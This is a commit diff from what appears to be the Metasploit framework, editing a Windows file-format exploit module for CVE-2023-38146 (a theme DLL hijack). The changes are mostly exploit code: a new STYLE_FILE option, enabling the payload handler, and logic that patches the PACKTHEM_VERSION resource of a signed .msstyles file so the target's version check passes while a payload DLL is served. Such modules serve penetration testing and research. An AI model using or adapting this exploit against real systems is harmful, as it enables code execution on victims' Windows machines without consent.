Bring in zerosteiner's PACKME_VERSION edit

rapid7 · Dec 20, 2023 · 7fafab9 · 7fafab9
2 parents 95eb4cc + 6f17088
commit 7fafab9
Showing 1 changed file with 11 additions and 7 deletions.
diff --git a/modules/exploits/windows/fileformat/theme_dll_hijack_cve_2023_38146.rb b/modules/exploits/windows/fileformat/theme_dll_hijack_cve_2023_38146.rb
@@ -21,7 +21,8 @@ def initialize(info = {})
         'DisclosureDate' => '2023-09-13',
         'Author' => [
           'gabe_k', # Discovery/PoC
-          'bwatters-r7' # msf exploit
+          'bwatters-r7', # msf exploit
+          'Spencer McIntyre' # msf exploit
         ],
         'References' => [
           ['CVE', '2023-38146'],
@@ -39,15 +40,15 @@ def initialize(info = {})
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
           'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS]
-        }
+        },
+        'DefaultOptions' => { 'DisablePayloadHandler' => false }
       )
     )
 
     register_options([
+      OptPath.new('STYLE_FILE', [ true, 'The Microsoft-signed .msstyles file (e.g. aero.msstyles).', '' ], regex: /.*\w*\.msstyles$/),
       OptString.new('STYLE_FILE_NAME', [ true, 'The name of the style file to reference.', '' ], regex: /^\w*(\.msstyles)?$/),
-      OptString.new('THEME_FILE_NAME', [ true, 'The name of the theme file to generate.', 'exploit.theme' ]),
-      OptPath.new('MS_SIGNED_DLL', [true, 'Signed Microsoft DLL to use for passing validation']),
-      OptPath.new('MS_VERSION_FILE', [true, 'Signed Microsoft DLL to use for passing validation'])
+      OptString.new('THEME_FILE_NAME', [ true, 'The name of the theme file to generate.', 'exploit.theme' ])
     ])
 
     deregister_options(
@@ -69,7 +70,7 @@ def setup
   end
 
   def primer
-    legit_dll = File.binread(datastore['MS_SIGNED_DLL'])
+    legit_dll = File.binread(datastore['STYLE_FILE'])
     payload_dll = generate_payload_dll
     max_length = [payload_dll.length, legit_dll.length].max
     # make sure that the lengths are the same by padding the smaller to the length of the larger
@@ -99,7 +100,10 @@ def primer
 
   def get_file_contents(client:)
     print_status("Sending file to #{client.peerhost}")
-    File.binread(datastore['MS_VERSION_FILE'])
+    pe_raw = File.binread(datastore['STYLE_FILE'])
+    pe = Rex::PeParsey::Pe.new_from_string(pe_raw)
+    version_offset = pe.rva_to_file_offset(pe.resources['/PACKTHEM_VERSION/0/0'].rva)
+    pe_raw[0...version_offset] + [999].pack('v') + pe_raw[(version_offset + 2)...]
   end
 
   def make_theme